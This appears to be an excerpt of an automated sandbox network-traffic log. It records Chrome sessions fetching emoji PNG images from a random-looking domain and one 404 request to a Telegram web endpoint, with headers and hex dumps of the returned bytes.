                                  2025-01-12 00:04:02 UTC1369INData Raw: 78 4c d0 20 de bb 72 e0 b1 b5 46 5d 03 42 30 f2 bd 17 96 57 fa 30 10 f0 f8 40 80 5d 63 14 96 e0 e8 83 10 76 81 e2 05 5c dd 06 04 94 b1 64 53 81 96 08 04 2d 78 ef 06 e5 71 81 92 70 e3 6a f9 61 61 a0 3c de 07 f6 80 d1 87 20 75 60 dd 06 70 3c 20 2e 54 40 a7 8e 07 44 8c 5e 7d e3 b5 0f e5 03 c1 7b 42 e5 00 71 30 0e 14 02 0c 81 0e 5f a3 8d 03 b1 aa 40 67 c4 56 ad ec 24 10 7d 42 20 a2 4d fb 9d ab 8b cb 53 80 b1 00 e9 23 71 5d 1d 94 38 f0 75 db 50 a8 72 ad 27 81 ca a4 13 40 e4 a4 40 24 73 6b df 58 bb 64 bc 87 10 1c b1 02 63 01 ca 68 83 11 89 40 3f a2 4d 4a d5 74 a0 31 49 04 a2 01 21 54 87 c4 91 1c 1b 88 24 d2 be f6 dc 4f 34 07 81 c0 a1 c0 d2 e1 21 d4 6c 75 a0 4e c6 80 c6 6a 03 51 28 84 52 2a a0 6e c6 36 73 0c 20 82 51 6f 3f ab 1e 50 81 10 77 b8 06 74 82 94 10 81
                                  Data Ascii: xL rF]B0W0@]cv\dS-xqpjaa< u`p< .T@D^}{Bq0_@gV$}B MS#q]8uPr'@@$skXdch@?MJt1I!T$O4!luNjQ(R*n6s Qo?Pwt
                                  2025-01-12 00:04:02 UTC1108INData Raw: 02 18 0a 56 ff 88 47 57 4a 80 db 5d 37 71 0d 31 69 ab 01 8f 31 12 70 7a 60 3e b8 f6 b9 07 3e b2 d5 9e 72 4f a2 98 1a 7d ac a1 0a b9 2f 40 b1 c5 ad ff 7c 2e be e5 1f 01 a1 7e db 89 02 8e 1c aa 30 8c 8d a5 54 40 cf e9 80 69 b2 f6 77 6f 5d b1 8e 03 2e 13 eb 15 18 81 89 d6 d6 d4 06 7b ac 8e 40 34 98 32 ce cd 9c 0a 28 29 d7 ff 74 f1 a2 20 07 01 15 f5 a8 a9 93 47 a3 f1 37 2c f5 d1 a8 7b 03 16 5b df fb ab 4b 2b e5 54 20 10 a6 77 19 ea c0 b1 c1 23 d4 70 b8 cc 53 9e 0a 18 6c b2 fe e2 0b 3f 9d 95 4c 02 f5 e4 cc 02 f5 55 cc a6 8f e7 25 ef fb d0 06 6a d3 6f 27 07 e6 e5 ea df 6f 5c 29 d9 03 52 9b 59 a8 d9 0c 00 76 12 98 d6 27 30 a9 cd 0f 9e 18 68 92 db d7 fe e6 91 46 98 3a b3 00 0e c0 d7 68 0c 81 87 8c 88 da da 0c eb c9 81 41 65 ac 3e ff e6 15 15 a8 03 41 26 26 8f 4c
                                  Data Ascii: VGWJ]7q1i1pz`>>rO}/@|.~0T@iwo].{@42()t G7,{[K+T w#pSl?LU%jo'o\)RYv'0hF:hAe>A&&L


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  117192.168.2.650051172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC608OUTGET /img-apple-160/1f1e7-1f1ed.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:03 UTC898INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:03 GMT
                                  Content-Type: image/png
                                  Content-Length: 4149
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-1035"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FrdiHIvXOKFGiJvmqhnaU8CP2QD9T8X6mkRtBU1ShdWz493QHNWzbvqt6MHaLImIR4jRTWEcTkFAqo%2FecCiZ0JpGMEyPBPv1hqoQwvNXHy3QXYHYeP%2F2SC2dT1YKkRZb%2B2l5rw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30c2b1a4369-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2094&min_rtt=2091&rtt_var=790&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1380614&cwnd=220&unsent_bytes=0&cid=b35f72dd3d671aaa&ts=623&x=0"
                                  2025-01-12 00:04:03 UTC471INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 7c 32 3a b4 7f 84 67 16 1f be be be a9 66 6d 68 14 1c 79 7a 7a 68 14 1d b8 6f 77 c4 c4 c4 68 14 1d 77 78 77 b5 6c 73 6f 1a 23 79 79 79 c0 c1 c1 b9 70 78 8b 1f 2c 99 2e 3a 6a 15 1e 75 75 75 c0 b3 b4 af 66 6d 6a 16 1f 9c 9c 9c 92 92 92 80 80 80 a4 a4 a4 b3 6b 72 67 13 1c bf bf bf 76 76 76 bb 73 7b 6b 17 20 c4 c4 c4 ad 61 69 68 12 1b 78 78 78 6e 19 23 bc 72 7a c5 c5 c5 68 12 1b 77 77 77 b2 67 6f 6b 1a 22 c5 c5 c5 6b 17 20 bc 72 7a b5 b5 b5 af 62 6a b3 a6 a7 b9 70 78 62 0f 18 73 72 72 fc ff ff f6 ff ff f1 ff ff f2 fb fa f6 f6 f6 f4 f4 f4 ed f7 f6 f2 f2 f2 f0 f0 f0 ef ee ee ed ed ed ed ec ec ec eb eb ea ea ea e9 e9 e9 e8 e8 e8 f0
                                  Data Ascii: PNGIHDRPLTEGpL|2:gfmhyzzhowhwxwlso#yyypx,.:juuufmjkrgvvvs{k aihxxxn#rzhwwwgok"k rzbjpxbsrr
                                  2025-01-12 00:04:03 UTC1369INData Raw: 62 6a c3 58 63 cd 4f 5c c6 52 5e 76 76 76 b5 57 61 a9 59 62 cc 49 57 ce 44 52 c0 48 55 b4 4d 58 a8 52 5b ce 3f 4e 82 5d 61 a9 4b 55 ce 3a 4a c1 40 4d d5 34 45 d4 34 45 b5 42 4e d3 34 44 ce 36 46 d4 33 44 d2 33 44 d2 33 43 d1 33 44 d3 32 43 d0 33 43 d2 32 42 cf 33 43 d2 31 42 d1 30 41 ce 31 42 ce 30 41 ac 3f 4b cf 2f 40 b9 39 46 cf 2e 3f c1 34 43 c8 30 40 cc 2e 3f ce 2c 3d cb 2c 3d cd 2a 3b ca 2b 3c c8 2b 3c c0 2e 3d ca 29 3a b0 33 40 c8 28 39 c6 28 39 c7 26 37 9c 38 42 cb 22 34 b7 2b 3a c4 25 36 c3 23 34 b9 26 35 c6 1f 31 c1 21 32 ae 29 37 c0 1f 30 c7 1a 2c b9 20 30 bf 1d 2e bc 1e 2e b5 21 30 a4 28 35 b2 21 30 bc 1b 2c b7 1d 2d ab 22 31 b9 1a 2b c7 12 25 c2 14 26 b6 19 2a 9a 25 32 b8 17 28 a4 20 2e 9c 22 2e b5 16 27 b2 17 28 b5 15 26 ac 19 28 b1 15 25 91
                                  Data Ascii: bjXcO\R^vvvWaYbIWDRHUMXR[?N]aKU:J@M4E4EBN4D6F3D3D3C3D2C3C2B3C1B0A1B0A?K/@9F.?4C0@.?,=,=*;+<+<.=):3@(9(9&78B"4+:%6#4&51!2)70, 0..!0(5!0,-"1+%&*%2( .".'(&(%
                                  2025-01-12 00:04:03 UTC1369INData Raw: 93 bf fb d0 c5 8f 55 92 90 8d 74 b3 e0 a6 34 21 c3 ca 71 b1 9b 14 74 77 03 1c 70 37 12 ee 52 95 f2 c4 99 17 2e bd 1b 35 39 34 b8 8d 5f 55 53 61 8b 1a 00 a2 4e 24 e8 c3 1a d9 4e 74 17 ef f1 c8 c3 7f b6 fc 41 c5 36 cc c6 b9 39 61 87 a7 27 43 aa c9 22 68 0e 18 0e 38 60 49 17 a2 23 fd fa 8e b3 bf 7f e7 87 25 24 1c 61 34 11 c9 82 25 3b 1a 9a 22 36 49 0e 3a 78 da 34 c7 86 25 3c ec 3d 32 28 8b ef bf f8 1b 6f 7f 40 5e 11 c1 a0 62 b4 d8 48 92 a3 73 03 61 4c 04 93 1f 38 80 93 a8 fa f2 f8 99 17 96 5f 07 47 e3 8e e3 27 70 93 3a 63 04 46 23 d9 e8 36 e8 6c 43 aa 15 1e fd ce 4b 5c 2c 11 87 a4 62 f8 58 37 37 dd e8 33 8d 91 dc 31 81 f9 04 45 02 e0 5b 61 34 67 50 3c 7e fc c5 b9 cb 35 79 e5 6c 60 e2 8c 73 33 50 87 c9 b1 00 8c 16 b4 61 89 38 d8 30 19 1d a0 9e 39 fa d7 2c 85
                                  Data Ascii: Ut4!qtwp7R.594_USaN$NtA69a'C"h8`I#%$a4%;"6I:x4%<=2(o@^bHsaL8_G'p:cF#6lCK\,bX7731E[a4gP<~5yl`s3Pa809,
                                  2025-01-12 00:04:03 UTC940INData Raw: af bc 9b 06 4c 14 1b a9 a6 23 64 09 c3 15 4e 02 13 0b a6 10 aa 6d 7f 97 d8 67 7d 68 5d 7e bf d6 e1 fe 60 a3 dd c6 12 82 b2 45 51 86 08 61 9c a0 da 56 ab 56 db 2a 0f 35 0f 44 7a fe d0 83 7f c1 c5 52 73 c7 48 08 8e 36 4a 1a ba 73 71 ad 45 a0 00 50 68 4c ab 31 11 54 43 5c 1c 8d 46 2a 62 a9 fa 77 3c fa e2 dd 9f f5 72 20 91 33 a0 c1 4d 31 4d bb a4 85 07 00 94 8c 16 79 81 42 1b 68 91 0c f3 72 b2 25 4e 95 2b 6a 82 83 a0 91 de 81 1f fe e5 c1 cb 9f 90 03 08 26 21 a2 d6 e8 96 de 02 00 2d bc 10 97 2e d0 85 30 0b b4 e9 ec 68 45 a8 4d 28 88 b8 80 38 29 f8 e2 aa bd 7f 38 7d 6a 6e f9 aa e3 e3 e6 bf a4 36 7c 6d 13 08 5d 68 c1 01 e8 f6 ba 3d 0d 40 a2 a2 cd 9a 76 7b 46 6b a4 a0 40 ea 34 6a 88 46 d2 b0 d0 5d fb 57 4e 6c dc d6 33 a8 76 9c 29 86 a8 0d 6a 2d 80 36 14 d0 a2 8b
                                  Data Ascii: L#dNmg}h]~`EQaVV*5DzRsH6JsqEPhL1TC\F*bw<r 3M1MyBhr%N+j&!-.0hEM(8)8}jn6|m]h=@v{Fk@4jF]WNl3v)j-6


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  118192.168.2.650052172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC370OUTGET /img-apple-160/1f1e6-1f1f2.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC890INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: image/png
                                  Content-Length: 3907
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-f43"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Plf4r7N2bS3uQTjEazLGzOwXZifUWnezIpNxn2BctRt4Fr4uxjDImuB9Nr2YhSAKvbft1EoEcZJuOqNINWQfLm3PTCTGjb4NSRpptQQ3ZELZKNDV4tFkUxIHAXDnUnxh6jco3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30c2cd05e82-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1722&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1672394&cwnd=216&unsent_bytes=0&cid=fa39bd1e167b9b44&ts=141&x=0"
                                  2025-01-12 00:04:02 UTC479INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c a8 5e 42 b8 5d 54 7e 49 0d 9c 56 32 7c 4e 0a ca 68 68 ca 67 67 7c 4f 0c c2 5b 5b 7c 4f 0b a4 6b 16 aa 17 17 18 17 77 02 17 86 0e 11 7e cb 69 69 bd 50 50 7b 4d 09 c4 63 63 8e 56 03 9f 0c 0c 92 00 00 07 02 5f 00 00 71 a8 2c 2c 72 45 02 82 54 0f ca 68 68 7e 51 0d c4 61 61 78 4a 07 84 57 13 cc 6a 6a 78 4a 07 75 47 04 c3 61 61 81 54 10 88 59 13 7a 4d 0a 84 57 13 a9 2f 2f ce 6b 6b c1 5d 5d 75 48 04 ff b8 11 ff b1 13 ff ac 1c fe a7 25 fd a6 25 ff a9 08 fb a5 24 fa a4 24 f9 a3 24 f8 a2 22 ff a2 06 f7 a1 20 f4 a1 24 f5 9f 1e fe 9f 05 f3 9e 1e f1 9c 1b ed 9c 24 fa 9a 00 ef 9a 1b f0 99 18 ed 98 17 e6 97 24 eb 95 15 e8 95 17 f2 93 00 e9
                                  Data Ascii: PNGIHDRPLTEGpL^B]T~IV2|Nhhgg|O[[|Okw~iiPP{MccV_q,,rEThh~QaaxJWjjxJuGaaTYzMW//kk]]uH%%$$$" $$$
                                  2025-01-12 00:04:02 UTC1369INData Raw: b5 3a 3a dc 29 29 ff 1c 0e 86 58 13 ce 2e 2e 6a 4f 88 8f 56 02 f3 1d 1d ea 20 20 da 23 34 6f 4d 74 85 55 0c f2 1a 1a ef 1a 1a d0 27 28 ef 17 17 82 51 08 df 1d 1d ec 16 16 fe 10 03 7d 4e 08 d2 1e 20 e9 14 14 ba 21 4c b3 2a 2a ea 12 12 e6 12 12 d5 18 1a 6d 44 48 7a 4a 03 d9 15 15 e0 12 12 e7 0f 0f f4 09 02 e4 0e 0e 74 46 02 93 22 68 e1 0c 0c cd 14 16 4e 3c 93 d9 0d 0d df 0a 0a bc 15 18 ea 02 00 dc 07 07 d3 0a 0b d9 06 06 57 36 5d d8 03 03 68 22 83 ab 15 16 a6 17 17 d5 02 02 40 2e a0 d2 02 02 cd 02 02 92 0e 45 c4 01 03 b8 01 05 26 26 b7 38 21 9f 25 25 b6 a7 01 0a 23 23 b5 22 22 b3 38 25 69 1b 23 bd 45 18 85 20 20 b2 1f 1f b0 0a 25 c8 6a 09 54 79 06 36 1d 1d ae 93 00 00 1b 1b ac 0f 1b c1 18 18 aa 17 17 a8 15 15 a6 07 18 ba 16 15 9b 14 14 a5 16 16 91 28 0c 8a
                                  Data Ascii: ::))X..jOV #4oMtU'(Q}N !L**mDHzJtF"hN<W6]h"@.E&&8!%%##""8%i#E %jTy6(
                                  2025-01-12 00:04:02 UTC1369INData Raw: 2d 2b bc 61 9f 73 74 58 58 cf 81 5b e5 13 93 dd 13 ec 6b 89 09 18 8b 06 3a 3a 53 03 96 84 be 40 2d 5b 46 d7 13 9c e6 ee a9 6d be 98 a5 cf 9a b8 ad 68 1a 61 38 17 63 b8 80 67 25 0b e0 89 fb fd 27 98 b6 ef f8 c0 c6 2d e9 56 4f 21 20 81 d5 86 58 c2 1d 1b 06 7a a0 5d 79 31 b7 46 5c 4e b0 e9 89 b1 ce 71 c7 ac b9 f5 12 6f be ea 7b 5f 0b 6b ec ae 63 9f 02 0e cb 6d 52 fb fb ec d0 df f0 60 2d fb e4 77 9c bb dd 1b b8 1b 7b db dc d0 31 7b a7 f7 e0 d6 0b 6a 79 3c dc e9 12 68 72 98 3d 82 b6 25 76 08 50 02 d6 98 dd c0 bb 0f 6d b7 4f cd 31 4c a0 eb 38 ce 8f a2 8b 23 09 70 4e 8a 25 f8 cb 8e aa 14 dc ad 80 80 63 4b 0d 7b a4 30 c4 d2 03 0e a7 4c 4f e6 4f 32 20 05 48 e0 43 40 ae 3b 3b 95 ca 56 5d 73 71 28 61 27 d0 f7 bb 41 a6 03 08 0c e4 06 6d 56 be cf 35 8c 09 79 8e 81 69
                                  Data Ascii: -+astXX[k::S@-[Fmha8cg%'-VO! Xz]y1F\Nqo{_kcmR`-w{1{jy<hr=%vPmO1L8#pN%cK{0LOO2 HC@;;V]sq(a'AmV5yi
                                  2025-01-12 00:04:02 UTC690INData Raw: 39 3b 09 ca 45 d1 56 e0 80 6c 30 8d 23 0c d0 86 be d1 e8 38 2a 85 41 2b 03 1a 32 01 e5 15 ab 39 e5 b5 05 f6 06 6a b7 2e 94 a0 7c 50 1e 91 10 d6 97 c4 bf 4b 93 20 68 40 2b 20 81 14 12 b4 81 1c b4 06 32 48 b8 a9 03 e6 56 3b 09 41 fc be c0 de 66 ec 26 be 04 14 fe 06 e9 d7 6c 9a 68 5b a1 61 88 5f a4 9a 84 24 8d ea 55 1f 15 dd dc 7a 87 d2 39 c9 56 a0 04 94 8f fb 55 a9 f2 fd 08 f1 ab 83 55 1e 81 40 9f e8 75 9a 86 9e 46 9e 90 91 c1 34 30 81 68 ec 20 e2 e0 8c 8e ea 32 6d 41 17 6c 05 86 1b 4e 58 ae b1 84 e1 11 f6 30 24 6e 6b b6 7e 6a 51 46 a4 71 40 1e c7 63 80 82 d8 42 04 35 f6 a8 ab 38 2b af 52 87 2e b3 8d c0 04 90 1b 61 34 04 58 17 4a 7f 02 7d 0a 07 90 c2 fa d8 16 fb c5 d0 32 a2 8c 1c 22 0e 03 fc 19 c4 3e 5f f9 b1 9d b6 be 46 7e e3 ae c8 32 e6 c3 c0 32 c1 00 8e
                                  Data Ascii: 9;EVl0#8*A+29j.|PK h@+ 2HV;Af&lh[a_$Uz9VUU@uF40h 2mAlNX0$nk~jQFq@cB58+R.a4XJ}2">_F~22


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  119192.168.2.650056149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:03 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:04:03 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  120192.168.2.650062172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC370OUTGET /img-apple-160/1f1e6-1f1fc.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:03 UTC901INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:03 GMT
                                  Content-Type: image/png
                                  Content-Length: 5061
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-13c5"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VjjlTkYdZ7sgVyGj9lb%2FkaNvpdJ9An7u5deNrHlfwpKBAal%2Fn8UW7YBRNcmCqnaOboDIibAhXEr3%2Bu4o6JhcWHaOA8IkK85MkZLbiAOj0DlW%2FJwxcBQ%2FyxA7uDbBzPQx0X2E6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30f5be00f75-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1487&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=948&delivery_rate=1879021&cwnd=221&unsent_bytes=0&cid=d4bb53029e6c32bd&ts=167&x=0"
                                  2025-01-12 00:04:03 UTC468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 31 43 5d 84 95 ab 34 46 60 81 92 a9 31 44 5e 8d 9d b3 80 90 a6 32 44 5d 7f 90 a7 33 45 5f ac 93 1b 4b 62 80 3f 57 7d 8c 9c b2 31 44 5e 7e 8e a5 2f 41 5b 92 7c 07 63 63 36 31 49 69 83 93 a9 31 45 5e 56 6a 86 8b 9b b2 33 45 5e 89 99 af 7f 8f a6 33 45 5e 8c 9c b2 30 43 5c 82 93 a9 36 48 62 89 99 af 2a 3c 55 8d 9e b4 7f 90 a5 38 4b 64 2b 3d 57 eb ea e6 ff e3 23 ff e0 27 fc dc 30 ff dc 20 d4 ce d3 f6 d8 36 f9 d7 27 fd d7 1b ed d3 3e f7 d2 17 f0 d1 29 e2 bc b9 e2 ce 49 f0 cd 18 ac c7 da d8 c8 53 ef c8 0d e7 c7 1e de c6 37 e9 c4 0b cb c2 60 b6 b7 c2 e1 c1 19 d5 a8 aa e4 bf 07 cc bd 47 be bb 6b d9 bb 16 df ba 05 96 b7 cf b4 b6 79 e1
                                  Data Ascii: PNGIHDRPLTEGpL1C]4F`1D^2D]3E_Kb?W}1D^~/A[|cc61Ii1E^Vj3E^3E^0C\6Hb*<U8Kd+=W#'0 6'>)IS7`Gky
                                  2025-01-12 00:04:03 UTC1369INData Raw: 88 d5 96 8a 31 66 88 b7 64 88 ba 63 87 b7 83 88 5d 6c 85 a6 70 87 90 63 86 b6 66 85 b0 6f 83 9e 61 85 b6 e4 56 4f 57 84 d2 61 84 b4 60 84 b5 a1 86 00 76 85 73 59 83 c9 5f 83 b3 62 82 ad 69 80 a1 5e 82 b2 5a 81 bc 61 80 a9 53 85 b3 6c 81 86 5d 80 b0 5c 7f af 52 7e ca 5b 7e ae 54 7d be 61 7c a0 65 7c 95 97 7f 01 59 7d ad 5d 7c a6 94 7e 09 59 7c ab 58 7b ab 59 7a a8 57 7a ab 65 7a 7e 58 79 a3 56 79 a8 55 79 aa 59 77 9f 54 77 a7 5e 76 90 de 44 41 4b 76 c1 54 76 a4 52 76 a6 51 75 a5 55 74 9c 51 74 a4 48 73 bb 4f 73 a3 4f 72 a0 55 71 95 4e 72 a2 76 72 34 4e 71 a0 50 70 9b 4c 70 a0 4c 6f 9f 42 6e bb 45 6e b0 4b 6e 9f 52 6d 90 4b 6e 9d 47 6e a6 de 37 33 4a 6d 9d 49 6c 9c 4a 6c 99 48 6b 9a 4e 6a 8e 43 6a a3 47 6a 97 3d 68 b2 46 68 94 47 66 90 4c 65 86 60 66 46 3e
                                  Data Ascii: 1fdc]lpcfoaVOWa`vsY_bi^ZaSl]\R~[~T}a|e|Y}]|~Y|X{YzWzez~XyVyUyYwTw^vDAKvTvRvQuUtQtHsOsOrUqNrvr4NqPpLpLoBnEnKnRmKnGn73JmIlJlHkNjCjGj=hFhGfLe`fF>
                                  2025-01-12 00:04:03 UTC1369INData Raw: 8b 48 cd 41 de 46 0f c1 44 a1 25 18 3a 35 10 38 3e 41 22 01 4e ee 15 af 54 77 77 3f 5b 0f a0 38 44 c4 fb 78 20 cc 87 e8 a3 0f 40 4f 3d 31 44 a1 15 8f 4c b0 3f 47 e7 2f e5 cb 37 f4 37 9f 6c 09 0c 2e 2d 08 3e 10 10 1a 12 87 6f 85 e6 90 1a 03 88 86 08 0a 8e 05 26 c1 84 b3 5f 77 77 2b bf 98 ff 62 5d 0d 41 22 ad 90 2e 8f 5c a9 89 f4 84 23 51 8a 01 9e 01 f6 1f 76 cd 2d 44 ae bb 8e e3 df ff e5 5c e6 cc 99 9d dd 9d bd 24 62 9b a4 dd 6a 7c 68 4c 5b 82 6d 2d b6 4a 1e 42 22 09 28 28 94 12 68 15 ed 5b 9e 45 21 88 88 55 04 1f 54 48 a5 0f 6a d1 27 7d a8 36 50 c4 07 0b 09 22 62 a2 d6 d4 c6 6e 62 b3 c9 de b2 97 99 dd 73 66 ce e5 7f d3 73 ce b0 43 37 67 a7 9b 98 25 2b ec f7 e9 70 7e 9c ff 7c f8 5d be ff 99 39 ff f5 25 a7 f9 ad e4 25 fa 68 8c e4 d8 ab 70 05 91 c5 aa 19 a5
                                  Data Ascii: HAFD%:58>A"NTww?[8Dx @O=1DL?G/77l.->o&_ww+b]A".\#Qv-D\$bj|hL[m-JB"((h[E!UTHj'}6P"bnbsfsC7g%+p~|]9%%hp
                                  2025-01-12 00:04:03 UTC1369INData Raw: ce 00 d0 9c ac 52 18 75 15 a8 21 a8 f6 3a 47 a8 58 a4 d6 33 47 83 e9 05 39 57 0a 88 d1 cb e7 43 97 8f 1d da 53 1f 02 10 24 6b 69 24 4c a0 10 93 a8 54 ec e2 48 ec ec bf f4 72 14 88 24 35 86 10 58 ca fc 57 79 49 07 aa e3 c3 08 91 4e 11 74 3f 82 53 10 67 a4 0a 00 b4 bd 3a e9 03 40 03 c0 d8 52 dd f2 f2 db 6d 2a b3 60 1a b6 9c 87 c7 4c f4 e3 92 17 3e 8d 37 a6 ff 78 45 22 04 32 4f 3a 54 19 d9 2d 01 d3 3d 52 86 14 b9 96 10 c7 0b 8b ad 28 90 b1 49 62 a9 a0 29 83 51 c6 10 64 6c be 3b 36 ec 23 4c 91 48 e4 32 b9 51 d7 02 0d 33 17 e8 28 60 49 04 05 61 21 13 65 96 ab 1c 52 f1 f1 b1 87 86 1a 55 44 41 12 24 60 d5 f1 9a b5 37 b8 15 70 64 26 79 e7 dc 9b 21 38 20 25 c0 3c b8 15 31 5a 43 15 75 60 05 c0 75 20 0c b3 ad 20 36 1a 90 dc e4 73 a2 14 21 b6 53 75 2a 43 b5 9c 2d 81
                                  Data Ascii: Ru!:GX3G9WCS$ki$LTHr$5XWyINt?Sg:@Rm*`L>7xE"2O:T-=R(Ib)Qdl;6#LH2Q3(`Ia!eRUDA$`7pd&y!8 %<1ZCu`u 6s!Su*C-
